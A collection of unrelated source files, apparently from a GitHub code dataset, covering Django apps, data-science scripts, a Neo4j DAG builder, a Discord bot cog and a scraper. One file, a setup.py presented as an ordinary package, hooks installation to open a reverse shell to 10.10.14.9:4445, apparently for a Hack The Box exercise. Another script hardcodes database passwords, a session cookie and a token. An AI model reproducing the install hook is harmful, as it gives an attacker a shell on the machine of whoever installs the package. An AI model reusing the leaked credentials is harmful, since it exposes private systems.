request = json.loads(data.decode('utf-8'))
response = handle_request(request)
return response
except Exception as e:
return {
"error": str(e)
}
| rclevenger-hm/oci-hadoop-job-automation | function/submit_hadoop_job.py | submit_hadoop_job.py | py | 1,588 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "paramiko.SSHClient",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "paramiko.AutoAddPolicy",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "paramiko.RSAKey",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "json.loads",... |
12085831934 | from django.urls import re_path, include
from registration import views
from django.contrib.auth import views as auth_views
urlpatterns = [
re_path(r'^login/$', auth_views.login, name='login'),
re_path(r'^logout/$', auth_views.logout, {'next_page': '/'}, name='logout'),
re_path(r'^signup/$', views.signup, name='signup'),
re_path(r'^profile/(?P<pk>\d+)$', views.view_profile, name='view_profile'),
re_path(r'^profile/(?P<pk>\d+)$', views.view_profile, name='edit_profile'),
re_path(r'^approve', views.approve_and_close, name='approve_and_close')
]
| rgeurgas/Sid | registration/urls.py | urls.py | py | 575 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.re_path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.views.login",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.contrib.auth.views",
"line_number": 7,
"usage_type": "name"
},
{
"a... |
31266470749 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('text', models.TextField(blank=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False)),
],
),
migrations.CreateModel(
name='Like',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('slug', models.CharField(max_length=220, blank=True)),
('description', models.TextField(blank=True)),
('price', models.DecimalField(max_digits=16, decimal_places=2)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False)),
('modified_at', models.DateTimeField(default=django.utils.timezone.now)),
],
),
migrations.AddField(
model_name='like',
name='product',
field=models.ForeignKey(default=None, to='product.Product'),
),
migrations.AddField(
model_name='like',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='comment',
name='product',
field=models.ForeignKey(to='product.Product'),
),
migrations.AddField(
model_name='comment',
name='user',
field=models.ForeignKey(default=None, blank=True, to=settings.AUTH_USER_MODEL),
),
migrations.AlterUniqueTogether(
name='like',
unique_together=set([('product', 'user')]),
),
]
| unkvuzutop/product | product/migrations/0001_initial.py | 0001_initial.py | py | 2,443 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.migrations.Migration",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "django.db.migrations",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.db.migrations.swappable_dependency",
"line_number": 12,
"usage_type": "call... |
28721703847 | import warnings
import statsmodels.api as sm
from statsmodels.stats.outliers_influence import variance_inflation_factor
def print_vif(x):
"""Utility for checking multicollinearity assumption
:param x: input features to check using VIF. This is assumed to be a pandas.DataFrame
:return: nothing is returned the VIFs are printed as a pandas series
"""
# Silence numpy FutureWarning about .ptp
with warnings.catch_warnings():
warnings.simplefilter("ignore")
x = sm.add_constant(x)
vifs = []
for i in range(x.shape[1]):
vif = variance_inflation_factor(x.values, i)
vifs.append(vif)
print('VIF results\n-------------------------------')
print(pd.Series(vifs, index=x.columns))
print('-------------------------------\n') | Ninjaneer1/theWorks | print_vif.py | print_vif.py | py | 803 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "warnings.catch_warnings",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "warnings.simplefilter",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "statsmodels.api.add_constant",
"line_number": 15,
"usage_type": "call"
},
{
"api_na... |
18395372288 | """
Produce the feature importance matrices for the trained RF models as in Figures 4-6 of Appleby+2023.
"""
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import pickle
import sys
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor
from sklearn import preprocessing
from sklearn.metrics import r2_score, explained_variance_score, mean_squared_log_error, mean_squared_error
from scipy.stats import pearsonr
np.random.seed(1)
plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=16)
if __name__ == '__main__':
model = sys.argv[1]
wind = sys.argv[2]
snap = sys.argv[3]
line = sys.argv[4]
features = ['N', 'b', 'EW', 'dv', 'r_perp', 'mass', 'ssfr', 'kappa_rot']
predictors = ['delta_rho', 'T', 'Z']
features_pretty = [r'${\rm log} N$', r'$b$', r'${\rm log\ EW}$',
r'${\rm d}v$', r'$f_{r200}$', r'${\rm log} M_\star$',
r'${\rm sSFR}$', r'$\kappa_{\rm rot}$']
predictors_pretty = [r'${\rm log}\ \delta$', r'${\rm log}\ T$', r'${\rm log}\ Z$']
lines = ["H1215", "MgII2796", "CII1334", "SiIII1206", "CIV1548", "OVI1031"]
lines_short = ['HI', 'MgII', 'CII', 'SiIII', 'CIV', 'OVI']
zsolar = [0.0134, 7.14e-4, 2.38e-3, 6.71e-4, 2.38e-3, 5.79e-3]
model_dir = './models/'
cmap = sns.color_palette("flare_r", as_cmap=True)
fig, ax = plt.subplots(1, 3, figsize=(18, 9))
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.82, 0.295, 0.02, 0.4])
importance = np.zeros((3, len(features), len(features)))
for p, pred in enumerate(predictors):
# Load in the random forest gridsearch and the absorber data
gridsearch, _, _, _, _ = \
pickle.load(open(f'{model_dir}{model}_{wind}_{snap}_{lines_short[lines.index(line)]}_lines_RF_{pred}.model', 'rb'))
df_full = pd.read_csv(f'data/{model}_{wind}_{snap}_{line}_lines.csv')
train = df_full['train_mask']
err = pd.DataFrame(columns=['Feature removed', 'Pearson', 'r2_score', 'explained_variance_score', 'mean_squared_error'])
for i in range(len(features)):
# Iteratively choose all features but one
features_use = np.delete(features, i)
idx = np.delete(np.arange(len(features)), i)
# Scale the features and predictors to mean 0 and sigma 1
feature_scaler = preprocessing.StandardScaler().fit(df_full[train][features_use])
predictor_scaler = preprocessing.StandardScaler().fit(np.array(df_full[train][pred]).reshape(-1, 1) )
# Train a random forest model using the best parameters from the full grid search and all but one of the features
random_forest = RandomForestRegressor(n_estimators=gridsearch.best_params_['n_estimators'],
min_samples_split=gridsearch.best_params_['min_samples_split'],
min_samples_leaf=gridsearch.best_params_['min_samples_leaf'],)
random_forest.fit(feature_scaler.transform(df_full[train][features_use]), predictor_scaler.transform(np.array(df_full[train][pred]).reshape(-1, 1) ))
# Get the feature importances
importance[p][i][idx] = random_forest.feature_importances_
# Evaluate the performance of the model
conditions_pred = predictor_scaler.inverse_transform(np.array( random_forest.predict(feature_scaler.transform(df_full[~train][features_use]))).reshape(-1, 1) )
conditions_true = pd.DataFrame(df_full[~train],columns=[pred]).values
conditions_pred = conditions_pred.flatten()
conditions_true = conditions_true.flatten()
if pred == 'Z':
conditions_pred -= np.log10(zsolar[lines.index(line)])
conditions_true -= np.log10(zsolar[lines.index(line)])
scores = {}
scores['Feature removed'] = features[i]
scores['Pearson'] = round(pearsonr(conditions_true, conditions_pred)[0],3)
for _scorer in [r2_score, explained_variance_score, mean_squared_error]:
scores[_scorer.__name__] = float(_scorer(conditions_pred,
conditions_true, multioutput='raw_values'))
err = err.append(scores, ignore_index=True)
print(pred, err)
# Plot importance matrix
importance_use = np.transpose(importance[p])
mask = importance_use == 0
if p == len(predictors) - 1:
g = sns.heatmap(importance_use, mask=mask, cmap=cmap, vmax=1, vmin=0, annot=False, ax=ax[p], square=True, linewidths=.5,
cbar_ax=cbar_ax, cbar_kws={'label': 'Importance'})
else:
g = sns.heatmap(importance_use, mask=mask, cmap=cmap, vmax=1, vmin=0, annot=False, ax=ax[p], square=True, linewidths=.5,
cbar=False)
g.figure.axes[p].set_xticklabels(features_pretty, rotation='vertical', fontsize=15)
g.figure.axes[p].set_xlabel('Removed feature')
if p == 0:
g.figure.axes[p].set_ylabel('Remaining features')
g.figure.axes[p].set_yticklabels(features_pretty, rotation='horizontal', fontsize=15)
else:
g.figure.axes[p].set_yticklabels(['']*len(features), rotation='horizontal', fontsize=15)
g.figure.axes[p].set_title(predictors_pretty[p])
g.figure.axes[p].tick_params(left=False, bottom=False) ## other options are right and top
fig.subplots_adjust(wspace=0.1)
plt.savefig(f'plots/{model}_{wind}_{snap}_{lines_short[lines.index(line)]}_lines_RF_importance.png')
plt.close()
| sarahappleby/cgm_ml | plot_feature_importance.py | plot_feature_importance.py | py | 5,793 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.random.seed",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot.rc",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "matplotlib.p... |
12868339424 | from typing import List
from name_genie.common import data_dao_stem, data_dao_male_suffix, data_dao_female_suffix, data_shared_dao, data_shared_thing, data_shared_adj, data_shared_number
from name_genie.util import to_str
import random
__all__ = ['get_daos']
stems = data_dao_stem + data_shared_dao + data_shared_thing + data_shared_adj + data_shared_number
suffixes = data_dao_male_suffix + data_dao_female_suffix
def get_daos(count: int = 10,
gender: int | None = None,
stem: str | None = None,
suffix: str | None = None) -> List[str]:
"""
生成道号
生成算法:(stem) + (suffix)
:param count: 数量
:param gender: 性别: 1 - 男; 2 - 女
:param stem: 词干
:param suffix: 后缀
:return:
"""
names: List[str] = []
for i in range(count):
gender2 = gender
stem2 = stem
suffix2 = suffix
if stem2 is None:
stem2 = random.choice(stems)
if suffix2 is None:
if gender2 == 1:
suffix2 = random.choice(data_dao_male_suffix)
elif gender2 == 2:
suffix2 = random.choice(data_dao_female_suffix)
else:
suffix2 = random.choice(suffixes)
name = to_str(stem2) + to_str(suffix2)
names.append(name)
return names
if __name__ == '__main__':
print(get_daos())
| name-genie/name-genie-python | name_genie/dao.py | dao.py | py | 1,399 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "name_genie.common.data_dao_stem",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "name_genie.common.data_shared_dao",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "name_genie.common.data_shared_thing",
"line_number": 9,
"usage_type": "na... |
30397116642 | from dagger import conf
from dagger.dag_creator.graph_traverser_base import GraphTraverserBase
from dagger.graph.task_graph import Graph
from dagger.utilities import uid
from neo4j import GraphDatabase
class DagCreator(GraphTraverserBase):
def __init__(self, task_graph: Graph):
super().__init__(task_graph, True)
neo4j_uri = "bolt://{host}:{port}".format(
host=conf.NE4J_HOST, port=conf.NE4J_PORT
)
self._neo4j_driver = GraphDatabase.driver(neo4j_uri, auth=("neo4j", "test"))
with self._neo4j_driver.session() as session:
session.write_transaction(self._reset_graph)
@staticmethod
def _reset_graph(tx):
tx.run("MATCH ()-[r]->() DELETE r")
tx.run("MATCH (n) DELETE n")
@staticmethod
def _add_node(tx, node_type: str, **kwargs):
node_args = ", ".join([f'{key}:"{value}"' for key, value in kwargs.items()])
create_cmd = f"CREATE (node:{node_type} {{{node_args}}}) RETURN node"
result = tx.run(create_cmd)
return result.single()['node'].id
@staticmethod
def _add_edge(tx, from_id: int, to_id: int, relationship_type: str, **kwargs):
relationship_args = ", ".join(
[f'{key}:"{value}"' for key, value in kwargs.items()]
)
create_cmd = f"""
MATCH (from_node), (to_node)
WHERE ID(from_node)={from_id} AND ID(to_node)={to_id}
CREATE (from_node)-[:{relationship_type} {{{relationship_args}}}]->(to_node)
"""
tx.run(create_cmd)
def _create_dag(self, pipe_id, node):
with self._neo4j_driver.session() as session:
node_id = session.write_transaction(
self._add_node,
"Dag",
name=node.obj.name,
description=node.obj.description,
uid=uid.get_pipeline_uid(node.obj)
)
return node_id
def _create_job_task(self, node):
with self._neo4j_driver.session() as session:
node_id = session.write_transaction(
self._add_node,
"Job",
name=node.obj.name,
description=node.obj.description,
uid=uid.get_task_uid(node.obj)
)
pipe_id = node.obj.pipeline_name
with self._neo4j_driver.session() as session:
session.write_transaction(
self._add_edge, node_id, self._dags[pipe_id], "TASK_OF"
)
return node_id
def _create_data_task(self, pipe_id, node):
# if pipe_id not in self._data_tasks:
# self._data_tasks[pipe_id] = {}
dataset_id = node.obj.airflow_name
if dataset_id not in self._data_tasks:
with self._neo4j_driver.session() as session:
self._data_tasks[dataset_id] = session.write_transaction(
self._add_node,
"Dataset",
name=node.obj.alias(),
description=node.obj.name,
uid=uid.get_dataset_uid(node.obj)
)
def _create_edge_without_data(self, from_task_id, to_task_ids, node):
raise NotImplemented
def _create_edge_with_data(self, from_task_id, to_task_ids, node):
from_pipe = (
self._task_graph.get_node(from_task_id).obj.pipeline_name
if from_task_id
else None
)
data_id = node.obj.airflow_name
if from_pipe:
with self._neo4j_driver.session() as session:
session.write_transaction(
self._add_edge,
self._tasks[from_task_id],
self._data_tasks[data_id],
"GENERATED_BY",
)
for to_task_id in to_task_ids:
to_pipe = self._task_graph.get_node(to_task_id).obj.pipeline_name
with self._neo4j_driver.session() as session:
session.write_transaction(
self._add_edge,
self._data_tasks[data_id],
self._tasks[to_task_id],
"DEPENDS_ON",
)
| siklosid/dagger | dagger/dag_creator/neo4j/dag_creator.py | dag_creator.py | py | 4,182 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "dagger.dag_creator.graph_traverser_base.GraphTraverserBase",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "dagger.graph.task_graph.Graph",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "dagger.conf.NE4J_HOST",
"line_number": 12,
"usage_... |
19682706596 | import datetime
import json
import requests
from apps.findprice.models import Product, CATEGORY_CHOICES, Scan, User
from apps.findprice.serializers import ProductSerializer, ScanSerializer, ProductsCatSerializer, \
ScansForProductSerializer
from django.contrib.auth.forms import SetPasswordForm
from django.http import JsonResponse
from django.shortcuts import render
from rest_framework import viewsets
class ProductViewSet(viewsets.ModelViewSet):
serializer_class = ProductSerializer
queryset = Product.objects.all()
class ScanViewSet(viewsets.ModelViewSet):
serializer_class = ScanSerializer
queryset = Scan.objects.all()
def getCategory(request):
if request.method == 'GET':
category = []
id = []
for i in range(len(CATEGORY_CHOICES)):
id.append(i)
category.append(CATEGORY_CHOICES[i][0])
categories = [{"id": t, "category": s} for t, s in zip(id, category)]
# return (json.dumps(categories))
return JsonResponse(categories, safe=False)
class getProductsSet(viewsets.ModelViewSet):
# queryset = Product.objects.all()
serializer_class = ProductsCatSerializer
def get_queryset(self):
queryset = Product.objects.all()
category = self.request.query_params.get('cat')
id = self.request.query_params.get('id')
if category is not None:
queryset = queryset.filter(category=category)
if id is not None:
queryset = queryset.filter(id=id)
return queryset
class getProductScan(viewsets.ModelViewSet):
serializer_class = ScansForProductSerializer
def get_queryset(self):
queryset = Scan.objects.all()
filter = self.request.query_params.get('filter')
if filter is not None:
filter = json.loads(filter)
lat = filter['lat']
long = filter['long']
id = filter['id']
dt = filter['dt']
if(id== '*'):
print(id)
pdt = datetime.datetime.strptime(dt, "%Y-%m-%dT%H:%M:%S.%fZ") - datetime.timedelta(days=7)
queryset = queryset.filter(lat__lte=float(lat) + 0.5, lat__gte=float(lat) - 0.5,
long__lte=float(long) + 0.5, long__gte=float(long) - 0.5,
scan_time__lt=dt, scan_time__gt=pdt).order_by('-scan_time')
else:
queryset = queryset.filter(lat__lte=float(lat) + 0.5, lat__gte=float(lat) - 0.5,
long__lte=float(long) + 0.5, long__gte=float(long) - 0.5,
product=id, scan_time__lt=dt).order_by('-scan_time')[:10]
return queryset
| gdoganieri/backendfindprice | apps/findprice/views.py | views.py | py | 2,711 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.viewsets.ModelViewSet",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.viewsets",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "apps.findprice.serializers.ProductSerializer",
"line_number": 15,
"usag... |
12887801729 | import spacy
from spacy import displacy
nlp = spacy.load('en_coref_md')
print("loaded")
text = r'''
Although Apple does not break down sales of AirPods, the company reported in January that its "other" product category, which includes AirPod sales, grew 33% to $7.3 from a year earlier, the fastest growing category.'''
doc = nlp(text)
doc._.has_coref
coref = doc._.coref_clusters
resolved = doc._.coref_resolved
print(coref)
print(resolved)
displacy.serve(coref, style="ent")
| AngeloCioffi/Info-Retrieval-Practical-NLP | neuralcoref/corref.py | corref.py | py | 484 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "spacy.load",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "spacy.displacy.serve",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "spacy.displacy",
"line_number": 20,
"usage_type": "name"
}
] |
7004941204 | from distutils.core import setup
from setuptools.command.install import install
import socket, subprocess,os
class PreInstallCommand(install):
def run(self):
shell()
install.run(self)
def shell():
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.9",4445))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
setup(
name = 'pigpackage',
packages = ['pigpackage'],
version = '0.1',
license='MIT',
description = 'TYPE YOUR DESCRIPTION HERE',
author = 'YOUR NAME',
author_email = 'your.email@domain.com',
url = 'http://test.com/pigpackage',
keywords = ['pigpackage'],
cmdclass={'install':PreInstallCommand,},
)
| nutty-guineapig/htb-pub | sneakymailer/sneakymailer/mypackage/setup.py | setup.py | py | 773 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "setuptools.command.install.install",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "setuptools.command.install.install.run",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "setuptools.command.install.install",
"line_number": 8,
"usage_typ... |
2769538888 | import discord.ext.commands as disextc
import logging as lg
import yaml as yl
log = lg.getLogger(__name__)
class Config(disextc.Cog):
""" Configuration handler for the bot.
This is a yml file representation. Each configuration stored should be
under its own key:
discord:
exampledata1
exampledata2
reddit:
exampledata
Between the database and env vars for credentials, this should only be
used for things that would be beneficial to change at runtime.
This file should most optimally be 'read' before used, and 'saved' after
being altered. The defaults should be stored in each cog that utilizes
them.
Anything that is 'memory' should be stored in persistent memory cog.
Attributes:
-------------------------------------------
bot -> The bot that was initialized with the cog.
data -> a dictionary representation of the config file
"""
def __init__(self, bot: disextc.Bot):
super().__init__()
self.bot = bot
self.data = {}
# Listeners
@disextc.Cog.listener()
async def on_ready(self):
""" Initialize the config cog. """
# TODO: Change the config load into a retry-system.
# NOTE: This needs to be done immediately to ensure that other cogs
# won't have to wait long on it.
await self.load_config()
await self.bot.wait_until_ready()
txt_config_on_ready = "on_ready config cog fired."
log.debug(txt_config_on_ready)
# Helpers
async def load_config(self):
""" Loads config from Redis."""
# TODO: Error handling?
memory = self.bot.get_cog('Memory')
if memory is None:
raise RuntimeError('Could not get memory cog to save config.')
from cogs.memory import redis_db_config
pool = await memory.get_redis_pool(redis_db_config)
self.data = yl.safe_load(await pool.get('config'))
pool.close()
await pool.wait_closed()
log.info(f'Config Loaded')
async def save_config(self):
""" Saves config to Redis."""
# TODO: Error handling?
memory = self.bot.get_cog('Memory')
if memory is None:
raise RuntimeError('Could not get memory cog to save config.')
from cogs.memory import redis_db_config
pool = await memory.get_redis_pool(redis_db_config)
result = await pool.set('config', yl.safe_dump(self.data))
pool.close()
await pool.wait_closed()
log.debug(f'Save config results: {result}')
# Config Command Group
@disextc.group(name='con', hidden=True)
@disextc.is_owner()
async def config_group(self, ctx: disextc.Context):
"""Group for config cog commands."""
# TODO: more Gracefully
if ctx.invoked_subcommand is None:
await ctx.send('No config subcommand given.')
@config_group.command(name='show', hidden=True)
@disextc.is_owner()
async def show_config_command(self, ctx: disextc.Context):
"""Dumps current config into ctx. """
await ctx.send('```' + repr(self.data) + '```')
def setup(bot: disextc.Bot) -> None:
""" Loads config cog. """
bot.add_cog(Config(bot))
| guitaristtom/pythonbot-core | bot/cogs/config.py | config.py | py | 3,262 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "discord.ext.commands.Cog",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "discord.ext.commands",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "dis... |
69905055783 | from rest_framework.response import Response
from rest_framework.decorators import api_view
from rest_framework import status
from django.shortcuts import get_object_or_404
from .models import Genre, Movie, Comment
import requests
from .serializers import(
MovieListSerializer,
MovieSerializer,
CommentListSerializer,
CommentSerializer,
GenreSerializer,
)
from movies import serializers
# Create your views here.
MYKEY = 'fb9a96092cd1259e59917287f35839c8'
def getGenre(request):
genreURL = f'https://api.themoviedb.org/3/genre/movie/list?api_key={MYKEY}&language=ko-KR'
allGenre = requests.get(genreURL)
datas = allGenre.json().get('genres')
for data in datas:
Genre.objects.get_or_create(
id = data.get('id'),
name = data.get('name'),
)
return
def getMovie(request):
# n을 변수로삼고 for문을 돌려서 충분한 양의 영화정보를 DB에 저장할 수 있도록 한다.
for n in range(1, 20):
movieURL = f'https://api.themoviedb.org/3/discover/movie?api_key={MYKEY}&language=ko-KR&page={str(n)}'
# 스타트캠프 미세먼지 API 참조하며 가져오기,,
allMovie = requests.get(movieURL)
# get 'results' 찾는데 시간이 좀 걸렸음
datas = allMovie.json().get('results')
for data in datas:
Movie.objects.get_or_create(
# 원하는 친구들을 뽑아서 원하는 필드에 넣고
movie_id = data.get('id'),
title = data.get('original_title'),
overview = data.get('overview'),
release_date = data.get('release_date'),
voteavg = data.get('vote_average'),
# poster_path + 하는 부분도 검색해서 알게됨
poster_path = "https://image.tmdb.org/t/p/original"+ data.get('poster_path'),
)
# movie와 genre의 id끼리 M:N 모델을 수립하는 과정
# genre별 movie를 꺼내와야 하기 때문에 필요한 과정이다.
# 해당 영화의 genre 저장해주고
genreItems = data.get('genre_ids')
# 지금 for문 내에 잡혀있는 movie_id의 정보들 가져온다음
movie = Movie.objects.get(movie_id = data.get('id'))
# 하나의 영화에 장르ID가 여러개 있기 때문에 for문을 돌려가며 추가해줘야한다
for i in genreItems:
p1 = get_object_or_404(Genre, pk=i)
# M:N 필드에 추가
movie.genres.add(p1)
return
# 장르별로 무비 가져오기
@api_view(['GET'])
def movie_genre(request, genre_id):
movie_genres = Movie.objects.filter(genres=genre_id)
serializer = MovieListSerializer(movie_genres, many=True)
return Response(data=serializer.data)
# 모든 장르 가져오기
@api_view(['GET'])
def all_movie_genre(request):
genres = Genre.objects.all()
serializer = GenreSerializer(genres, many=True)
return Response(data=serializer.data)
@api_view(['GET']) # GET 요청이 올 때
def movie_list(request):
movies = Movie.objects.all()
# Movie 모델에 전체 데이터를 가져오고
serializer = MovieListSerializer(movies, many=True)
# 시리얼라이즈화 해서 serializer 변수에 저장! 디폴트값이 여러개 데이터는 못가져오니 many=True 꼭 넣어줘야함!
return Response(data=serializer.data)
# Response의 data키워드 인자에 serilaizer.data를 저장해서 보여주기
@api_view(['GET'])
def movie_detail(request, movie_id): # movie_id도 가져와서
movie = Movie.objects.get(pk=movie_id)
# movie_id와 같은 pk값을 가진 친구만 movie에 저장하고
serializer = MovieSerializer(movie)
# 똑같이 진행하는데 데이터는 1개일테니 many=True 필요없음!
return Response(data=serializer.data)
# 영화별로 댓글 불러오기
@api_view(['GET', 'POST'])
def comment_list(request, movie_id):
movie = get_object_or_404(Movie, pk=movie_id)
# 개별 movie 가져오고
if request.method == 'GET':
# 만약 GET 요청이면 ( 단순 조회면 )
comment = Comment.objects.filter(comment_movie=movie)
# review 중에 movie가 movie인 친구를 선별하여
serializer = CommentListSerializer(comment, many=True)
# 똑같이 serializer화 하여서
return Response(data=serializer.data)
# 보여주기
elif request.method == 'POST':
# 만약 POST 요청이면 ( 생성하는거면 )
serializer = CommentListSerializer(data=request.data)
# 방금 생성해서 보낸 데이터를 ReviewListSerializer에 담은 후 저장
if serializer.is_valid(raise_exception=True):
# 유효성 검사 // raise_exception을 통해 잘못된 요청이 들어왔을 때 자동으로 적절한 응답 보내기
serializer.save(comment_movie=movie)
# 해당 movie에 저장
return Response(data=serializer.data, status=status.HTTP_201_CREATED)
# 저장하고 잘 저장됐다는 의미에서 201 보내주기
# user별로 댓글 불러오기
@api_view(['GET'])
def comment_list_by_user(request, user_id):
comment = Comment.objects.filter(comment_user=user_id)
# review 중에 movie가 movie인 친구를 선별하여
serializer = CommentListSerializer(comment, many=True)
# 똑같이 serializer화 하여서
return Response(data=serializer.data)
# 보여주기
@api_view(['GET', 'PUT', 'DELETE'])
def comment_detail(request, movie_id, comment_id):
movie = get_object_or_404(Movie, pk=movie_id)
# 개별 무비를 가져오고
comment = get_object_or_404(Comment, pk=comment_id, comment_movie=movie)
# 그 무비에 해당하는 리뷰를 가져온다음
if request.method == 'GET':
# 요청이 GET이면
serializer = CommentSerializer(comment)
# serializer화 하여서
return Response(data=serializer.data)
# 보여주기
elif request.method == 'PUT':
# 요청이 PUT이면
serializer = CommentSerializer(comment, data=request.data, partial=True)
# data를 현재 요청되는 data로 바꾼 후 저장
# partial=True -> 전체를 바꾸지 않고 필드 중에 하나만 바꿔도 수정이 되도록
if serializer.is_valid(raise_exception=True):
serializer.save()
return Response(data=serializer.data)
elif request.method == 'DELETE':
# 요청이 'DELETE'이면
comment.delete()
# 삭제하고
data = {
'message': '성공적으로 삭제되었습니다!'
}
# message 띄워주기
return Response(data=data, status=status.HTTP_204_NO_CONTENT)
# HTTP도 No content를 이용한 204로
| jhs9497/MovieRecommendSite | backend/movies/views.py | views.py | py | 6,928 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "models.Genre.objects.get_or_create",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "models.Genre.objects",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_nam... |
34526548926 | import numpy as np
import openpyxl as op
import pandas as pd
import pymysql
from sqlalchemy import create_engine
import requests
import datetime as dt
import os
import xlrd
def read_table(path):
wb = op.load_workbook(path)
ws = wb.active
df = pd.DataFrame(ws.values)
df = pd.DataFrame(df.iloc[1:].values, columns=df.iloc[0, :])
return df
def is_contain_chinese(check_str):
"""
判断字符串是否包含中文
"""
for ch in check_str:
if ord(ch) > 255:
return True
return False
def is_chinese(l):
"""
删除list里含有中文的字符串
:param l: 待检测的字符串list
:return: 删去中文字符串后的list
"""
res = []
for i in l:
try:
if not is_contain_chinese(i):
res.append(i)
except:
continue
return res
def trim(s):
"""
删除字符串首位空格
"""
if s == '':
return s
elif s[0] == ' ':
return trim(s[1:])
elif s[-1] == ' ':
return trim(s[:-1])
else:
return s
# 连接数据库
# engine = create_engine(
# 'mysql+pymysql://leiming:pQx2WhYhgJEtU5r@rm-2ze314ym42f9iq2xflo.mysql.rds.aliyuncs.com:3306/plutus')
# conn = pymysql.connect(host='rm-2ze314ym42f9iq2xflo.mysql.rds.aliyuncs.com',
# port=3306, user='leiming',
# passwd='pQx2WhYhgJEtU5r',
# db="plutus",
# charset='utf8')
# 连接数据库(测试)
engine = create_engine(
'mysql+pymysql://leiming:vg4wHTnJlbWK8SY@rm-2zeq92vooj5447mqzso.mysql.rds.aliyuncs.com:3306/plutus')
conn = pymysql.connect(host='rm-2zeq92vooj5447mqzso.mysql.rds.aliyuncs.com',
port=3306, user='leiming',
passwd='vg4wHTnJlbWK8SY',
db="plutus",
charset='utf8')
# 读取数据
PATH = '/Users/edz/Documents'
url ='https://erp.banmaerp.com/Product/Spu/ExportHandler'
data = 'filter=%7B%22CreateTime%22%3A%7B%22Sort%22%3A-1%7D%7D'
headers = {
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36',
'cookie': '.AspNetCore.Session=CfDJ8HFZt5KhGHxPrfAKn%2Fe35kaRpPerMJVnDOQnJCjicT8lyd81AtsUwStenh5nUMsWpyuS%2Bu38igf9ADjk2fhr6CYTk87TukhPs3Uqvid6CI4gSaSqYkM7fHDGw4xEnUKIIhoVh5nzaNU57l2OfpixmIgipBDXzggD1pciKOzkXQdc; Hm_lvt_9be79ac4f097e2a0be24ee6c088e921b=1603200345,1603247430; ERP.Token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJJRCI6Ijc1MjIiLCJOYW1lIjoi6Zu35pmT5pmoIiwiVXNlclR5cGUiOiIzIiwiT3duVXNlcklEIjoiNzA0MCIsImV4cCI6MTYzNDc5MzM3MSwiaXNzIjoiRVJQLmJhbm1hZXJwLmNvbSIsImF1ZCI6IkVSUC5iYW5tYWVycC5jb20ifQ.r5r1FrpMRa_yWr3qxuLnrJXUAZST_CC6V8nt2V-MbxM; Hm_lpvt_9be79ac4f097e2a0be24ee6c088e921b=1603257395'}
r = requests.post(url=url, headers=headers, data=data)
file_name = PATH + '/本地产品导出.xlsx'.format(dt.datetime.now().date())
with open(file_name, 'wb') as file:
file.write(r.content)
data_cp = read_table(file_name)
os.remove(file_name)
# 删除第一列主标题
if "本地产品" in data_cp.columns.tolist():
